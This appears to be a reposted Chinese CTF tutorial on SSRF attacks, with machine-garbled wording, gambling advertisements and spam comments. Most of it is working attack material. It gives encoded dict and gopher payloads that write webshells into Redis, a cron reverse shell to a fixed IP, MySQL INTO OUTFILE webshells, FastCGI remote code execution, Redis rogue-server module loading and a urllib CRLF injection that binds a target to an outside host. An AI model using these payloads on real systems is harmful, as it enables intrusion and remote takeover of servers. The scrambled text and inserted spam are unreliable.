关于ssrf

ssrf在ctf中泛起的次数有许多,行使的方式也是多种多样,包罗差别的行使手法,绕过,协议的使用。

关于redis

在vps上开启我的redis服务,关于redis存在着一些小的破绽,例如未授权,有些时刻还没有设置auth,在ssrf中redis的行使方式多种多样,包罗反弹shell,webshell写入,sshkey上传等等。

行使dict协议

行使dict我们可以写shell。
关于信息的采集:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第1张
在redis下我们使用info即可获取redis的相关信息,对于gopher可以加上一个下划线在跟上info,同时我们也可以判断出ssrf的存在。

关于写入shell与准时设计

写入shell很简单,可以在内陆试验一下。

flushall
+OK
config set dir /home/wwwroot/default/wordpress
+OK
config set dbfilename shell.php
+OK
set webshell "<?php phpinfo();?>"
+OK
save
+OK

再看一下网站:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第2张
乐成写入phpinfo。
而这周只是在redis上,在现实的情形中,行使curl会泛起一些小的状态。
乐成写入,但这始终是内陆,现实场景下会有很大的差别,比如说行使curl下令。

[root@izbp1j0zu9bm2aus0jnbhtz ~], curl dict://127.0.0.1:6379/flushall
-ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP
+OK
+OK
[root@izbp1j0zu9bm2aus0jnbhtz ~], curl dict://127.0.0.1:6379/config:set:dir:/home/wwwroot/default/wordpress
-ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP
+OK
+OK
[root@izbp1j0zu9bm2aus0jnbhtz ~], curl dict://127.0.0.1:6379/config:set:dbfilename:shell.php
-ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP
+OK
+OK
[root@izbp1j0zu9bm2aus0jnbhtz ~], 
[root@izbp1j0zu9bm2aus0jnbhtz ~], curl dict://127.0.0.1:6379/set:webshell:"<?php phpinfo() ?>"
-ERR Unknown subcommand or wrong number of arguments for 'libcurl'. Try CLIENT HELP
+OK
+OK
<script language='php'> @eval($_POST['pass']);</script>

看上去是写进去了,实在并没有,我们行使tcpdump举行查看,发现实在由于?问号的缘故原由,后面的都被参数举行省略了,纵然我行使burpsuit也是不可避免的。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第3张
上边是传输历程中的流量。
以是在CTF中我们想要顺遂的写入一些敏感字符需要一些特定的方式。
vps上搭建环境:
破绽代码:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>

测试破绽:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第4张
在输入INFO后,获得输出,证实dict协议的可用性。
在这个环境中我照样无法直接写入?,我们可以行使编码,在这里我行使的是\x十六进制编码来完成。

dict://127.0.0.1:6379/set:webshell:"\x3C\x3fphp\x20phpinfo\x28\x29\x3b\x3f\x3e"

usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第5张

可以看到完全的输出了没有被转义。

接见url
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第6张
乐成写入。

写入反弹shell

行使准时义务写入反弹shell:

set 1 '\n\n*/1 * * * * root /bin/bash -i >& /dev/tcp/192.168.163.132/2333 0>&1\n\n'

转换一下即:
url=dict://127.0.0.1:6379/set:webshell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/127.0.0.1/2333\x200\x3e\x261\n\n"
但还要注重这里不能够这么写:\x5c 而应该直接就 \n

不能这么写会发生乱码,而且也无法写入,然则要知道linux中的cron不会报错,只要读到一行准确设置即可执行,这里直接\n
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第7张
服务器内里看一下:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第8张
乐成的获取了反弹shell。

端口探测

同样的行使dict协议我们也可以探测端口存活。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第9张

gopher

在行使ssrf攻击redis时行使gopher协议我们可以举行主从复制,shell的写入
我们先行使gopher写一些键值对。

127.0.0.1:6379> set key1 value1
OK

这个时刻行使tcpdump举行抓取流经6379的流量。
相关下令:`[root@izbp1j0zu9bm2aus0jnbhtz ~], tcpdump -i lo port 6379 -w 1200.pcap
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第10张
将红色段抓取下来。

2a 31 0d 0a 24 37 0d 0a  43 4f 4d 4d 41 4e 44 0d 
0a  
2a 33 0d 0a 24 33 0d 0a  73 65 74 0d 0a 24 34 0d 
0a 6b 65 79 31 0d 0a 24  36 0d 0a 76 61 6c 75 65 
31 0d 0a
凭据这个每个都加一个%号改为url花样即可。
%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a

这样直接打是不行的,还要举行url双编码,行使curl可以只编一次码,由于他只解码一次。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第11张
此时查看服务端:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第12张
实验写个shell:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第13张
转换一下:

%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%33%31%0d%0a%2f%68%6f%6d%65%2f%77%77%77%72%6f%6f%74%2f%64%65%66%61%75%6c%74%2f%77%6f%72%64%70%72%65%73%73%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a

curl发送一下:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第14张
准备保存到网页上:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第15张
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第16张

web端行使

在web端中举行双编码即可:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第17张
redis上看一下:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第18张
save也拼接上去,发包。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第19张
乐成写入:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第20张

关于反弹shell

跟行使dict协议一样。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第21张
乐成反弹:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第22张
注重:写在crontab上时刻反弹shell是这样的:

set webshell "\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/127.0.0.1/2333\x200\x3e\x261\n\n"

而写在/var/spool/cron/下需要我们将root去掉。

CentOS系统:
路径使用:/etc/crontab或者/var/spool/cron/root
ubuntu系统:
路径使用:/etc/crontab或者/var/spool/cron/crontabs/root

有些时刻redis是需要认证的,我们可以举行暴力破解,实验弱密码。

在行使的时刻加上auth的流量即可。

MySQL

gopher打mysql

行使ssrf我们不仅能够进攻靶机拿下受害机械获取shell,同样也可以获取一些数据库的信息,有些时刻我们可以拿这些数据库获取到的信息去扩大战果。

mysql数据库不存在密码的时刻:

无密码认证时直接发送TCP/IP数据包即可接见

环境设置:

SET PASSWORD FOR root@localhost=PASSWORD('');

sudo mysqld_safe --skip-grant-tables &

使用上述两条下令mysql数据库就可以不用密码举行登录。

行使tcpdump来举行流量抓取:

tcpdump -i lo -s 0 port 3306 -w mysql.pcap
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第23张
注重第一个红框为登录流量。

注重两个点:00 00 00 03以及01 00 00 00 01

然后跟dict协议一样直接打就行了。

ctfhub中的环境这里直接用了。
在这里发现存在ssrf破绽。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第24张
file协议没有办法举行读取 判断gopher能不能打,至于判断方式,我自己是行使sleep函数来举行判断的: ![](https://xzfile.aliyuncs.com/media/upload/picture/20201205125340-d819a030-36b5-1.png) 监听一下,将流量转为url`编码:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第25张
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第26张
休眠十秒,确定存在。

sql语句:

select '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php';

用上述方式抓取下来举行url双编码:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第27张
接见对应url:可以考察到回显。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第28张
有两种工具可以辅助我们快速天生payload
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第29张
以及
mysql -h 127.0.0.1 -u root -e "select '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/test.php';"
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第30张

fastcgi

cgifastcgi早已成为耳熟能详的一些服务了,详细原理网上有许多可见。

fastcgi:快速通用网关接口

在对fastcgi举行攻击的时刻我们还需要领会一下另一个名词:php-fpm

实现原理:

PHP-FPM 卖力治理一个历程池来处置来自 Web 服务器的 HTTP 动态请求,在 PHP-FPM 中,master 历程卖力与 Web 服务器举行通讯,吸收 HTTP 请求,再将请求转发给 worker 历程举行处置,worker 历程主要卖力动态执行 PHP 代码,处置完成后,将处置效果返回给 Web 服务器,再由 Web 服务器将效果发送给客户端。这就是 PHP-FPM 的基本事情原理  ,知乎上找的

php版本中的应用:从PHP 5.4 RC2最先,php-fpm已经转正了。

行使条件
  • PHP-FPM版本 >= 5.3.3
  • 知道服务器上随便一个php文件的绝对路径
关于环境搭建

由于我的服务器选择的就是nginxphp,单并没有使用9000端口,查看log日志发现它使用的是sock方式,以是我就没换,使用了CTFHUB的靶机举行操作。

攻击原理

PHP当中我们可以行使php://input举行一些代码执行等等,而在文件上传中我们也经常行使到htacess文件以及usr.ini文件,他们都有两个选项:auto_prepend_fileauto_append_file,将两者连系,我们让文件在加载前预加载php://input就能举行任何的PHP代码执行了,然后行使PHP当中的种种内置函数来举行下令执行就能够getshell

,

Allbet注册_ALLbet6.com

欢迎进入Allbet注册(Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

,
详细步骤

在我们使用一系列的方式举行信息搜集后发现目的机械使用了Fastcgi而且确认其网站上存在ssrf破绽。

由于看他的原理就可以发现这个实现是有点庞大的,以是我们可以直接行使网上的exp举行攻击。

第一种方式行使GOPHER天生payload直接打:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第31张
可以看到打乐成了。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第32张
写个准时义务就能一直弹shell了。

我们考察一下Gophers给我们的poc
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第33张

第二种也可以行使别人的expgithub上面有许多,我这里直接用p神的。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第34张
内陆开个端口监听:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第35张
把流量抓下来:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第36张
举行转换发包:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第37张
乐成执行我的php以是可以瞥见这实在是一个很贫苦的地方,能用gophers就只管用吧。

主从复制

关于主从复制:

若是当前服务器已经是某个主服务器(master server)的隶属服务器,那么执行 SLAVEOF host port 将使当前服务器住手对旧主服务器的同步,抛弃旧数据集,转而最先对新主服务器举行同步。
另外,对一个隶属服务器执行下令 SLAVEOF NO ONE 将使得这个隶属服务器关闭复制功效,并从隶属服务器转变回主服务器,原来同步所得的数据集不会被抛弃。

顺应场景:

当我们写shell的时刻我们无法绕过对特殊字符的过滤,我们可以行使主从服务器。

行使主从服务器来写shell:

环境搭建:

在这里由于我本机装redis两个实例没搞出来,由于装的时刻就不太一样,以是我直接拉了一个docker,而且做了个端口映射。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第38张
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第39张
实在以为部门的下令都已经在dict协议的时刻写过了,多了这么一点。

在本机上先试一下主从复制,然后放到公网上搞。

docker exec -it redis-test /bin/bash进入docker容器里,连上redis

master
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第40张
slave:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第41张
行使这个我们可以编写webshell

在实战中:假设6390端口的redis是我们可控的redis服务器,而6389正是我们需要举行攻击的。

我们只需要举行主从绑定操作即可,获取到流量:

usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第42张
将其编码行使gophers举行发送。

同时我们还需要

此时我们查看一下从机。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第43张
发现已经是写举行了主从复制。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第44张
这里编码的是这些数据包:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第45张
在主机上:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第46张
发送save包:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第47张
接见phpinfo.php:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第48张
完成了主从复制的写shell

而有些时刻需要举行auth的授权,在那里可以实验凭据他的返回流量举行爆破。

固然网上另有一键就能写shell的,行使python剧本模拟redis主从之间的交互历程:
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第49张

主从复制RCE

在上面我们已经通过主从复制完成了WebShell的写入,实在还可以更进一步直接RCE,在redis4.x以及5.x版本当中是存在RCE的可能性的。

相关下令:

设置redis的备份路径:config set dir ./
设置备份文件名为exp.so,默以为dump.rdb:config set dbfilename exp.so
设置主服务器IP和端口:slaveof 192.168.172.129 1234  
加载恶意模块:module load ./exp.so
切断主从,关闭复制功效:slaveof no one 
执行系统下令:system.exec 'whoami';system.rev 127.0.0.1 9999    
通过dump.rdb文件恢复数据:config set dbfilename dump.rdb
删除exp.so:system.exec 'rm ./exp.so'
卸载system模块的加载:module unload system
天生exp.so

网上有许多exppoc,这里拿的是

https://github.com/n0b0dyCN/redis-rogue-server

r3kapig写的。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第50张
在现实当中很少有这样的情形,若是我们完成一次这样的渗透需要知足两个条件:

protected-modeno, bind 由127.0.0.1 改为0.0.0.0。 ps:bind改动后服务器上随便网卡地址可接见

在两个Redis实例设置主从模式的时刻,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载so文件,我们就可以执行拓展的新下令了。

现在我自己的机械上试验一下:

[>] PING - test if a connection is still alive
[<] +PONG
[>] REPLCONF - exchange replication information between master and slave
[<] +OK
[>] PSYNC/SYNC - synchronize slave state with the master
[<] +FULLRESYNC

把打的流量截取下来:(这里就是加载exp的历程)
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第51张
不用剧本打的话无非就是把exp的位置放对了就可以。

PYTHON之URLLIB头注入ssrf&&祥云杯doyouknowssrf

在上周的祥云杯竞赛中就碰到了这类的ssrf

pythonurllib当中存在着此类破绽,破绽对谁人存在的响应版本为2.7.10之前以及 3.4.4之前。

而在2019年又爆出了CVE-2019-9740,它的对应版本也是在3.7.x以及2.7.16以及CVE-2019-9947

前者的行使方式为:注入点在IP地址和端口号的分隔符即:前面

examplehttp://192.168.10.137:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123:8080/test/?test=a

后者为:注入点在端口号后面

example:http://192.168.10.137:7777/?q=HTTP/1.1\r\nHeader: Value\r\nHeader2: \r\n

问题源码如下
<?php
// ini_set("display_errors", "On");
// error_reporting(E_ALL | E_STRICT);


function safe_url($url,$safe) {
    $parsed = parse_url($url);
    $validate_ip = true;
    if($parsed['port']  && !in_array($parsed['port'],array('80','443'))){

        echo "<b>请求错误:非正常端口,因安全问题只允许抓取80,443端口的链接,若有特殊需求请自行修改程序</b>".PHP_EOL;

        return false;
    }else{
        preg_match('/^\d+$/', $parsed['host']) && $parsed['host'] = long2ip($parsed['host']);
        $long = ip2long($parsed['host']);
        if($long===false){
            $ip = null;
            if($safe){
                @putenv('RES_OPTIONS=retrans:1 retry:1 timeout:1 attempts:1');
                $ip   = gethostbyname($parsed['host']);
                $long = ip2long($ip);
                $long===false && $ip = null;
                @putenv('RES_OPTIONS');
            }
        }else{
            $ip = $parsed['host'];
        }
        $ip && $validate_ip = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    }

    if(!in_array($parsed['scheme'],array('http','https')) || !$validate_ip){
        echo "<b>{$url} 请求错误:非正常URL花样,因安全问题只允许抓取 http:// 或 https:// 开头的链接或公有IP地址</b>".PHP_EOL;

        return false;
    }else{
        return $url;
    }
}


function curl($url){
    $safe = false;
    if(safe_url($url,$safe)) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $co = curl_exec($ch);
        curl_close($ch);
        echo $co;
    }
}

highlight_file(__FILE__);
curl($_GET['url']);

凭据两者剖析的差异性直接就这么写就能打到内网:

url=http://foo@127.0.0.1:6379%20@www.sina.com/

由于协议的限制,我们无法使用dict等协议,只能使用http那么我们可以使用CRLF举行内网的探测。

实在随着更进一步可以考察到这个不只有6379端口是能被行使的,5000端口也存在着破绽,凭据返回的响应头以及hint可以大致推断出这里才是crlf行使点:

?url=http://foo@127.0.0.1:5000%20@www.sina.com/%3Furl=https://baidu.com

接下来就是行使Python-urllib/3.7crlf破绽举行攻击

组织poc:

url=http://foo@127.0.0.1:5000 @www.sina.com/?url=http://127.0.0.1:6379/%20HTTP/1.1%0D%0Aauth%20123456%0D%0Aconfig%20set%20dir%20/var/www/html%0D%0Aconfig%20set%20dbfilename%20shell.php%0D%0Aslaveof%20116.62.207.70%2021000%0D%0Afoo%3A%20

设置的redis下令就是:

auth 123456 ,爆破出来的弱密码
config set dir /var/www/html
config set dbfilename shell.php
slaveof 116.62.207.70 21000   ,21000是我们redis-rogue,用的是主从复制写shell
foo:

没有行使exp.so直接getshell的缘故原由是它存在的限制太多了,组内的师傅试了一下没有流量返 *** 来就用了写shell的方式。
usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式 安全技术 WEB安全 第52张
shell打出去了,直接蚁剑连一下就行。


Allbet声明:该文看法仅代表作者自己,与www.allbetgame.us无关。转载请注明:usdt支付平台(caibao.it):浅析SSRF在CTF中的种种实现方式
发布评论

分享到:

皇冠足球社区:加快科技体制改革攻坚建设全国统一电力市场体系建立中小学校党组织领导的校长负责制
3 条回复
  1. 皇冠官网手机版
    皇冠官网手机版
    (2021-02-15 00:03:55) 1#

    环球UG欢迎进入环球UG官网(UG环球),环球UG官方网站:www.ALLbetgame.us开放环球UG网址访问、环球UG会员注册、环球UG代理申请、环球UG电脑客户端、环球UG手机版下载等业务。别忘了更啊

    1. 皇冠注册平台
      皇冠注册平台
      (2021-04-26 08:04:52)     

      IPFS官网IPFS官网(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS官网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。情节滚瓜烂熟了

  2. UG环球(www.ugbet.us)
    UG环球(www.ugbet.us)
    (2021-11-25 00:05:35) 2#

      值得一提的是,苏州银行资产质量创下近8年来最优,不良实现“双降”,不良贷款率1.22%,较年头下降0.16个百分点;拨备笼罩率368.88%,较年头上升77.14个百分点。不差这点浏量

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。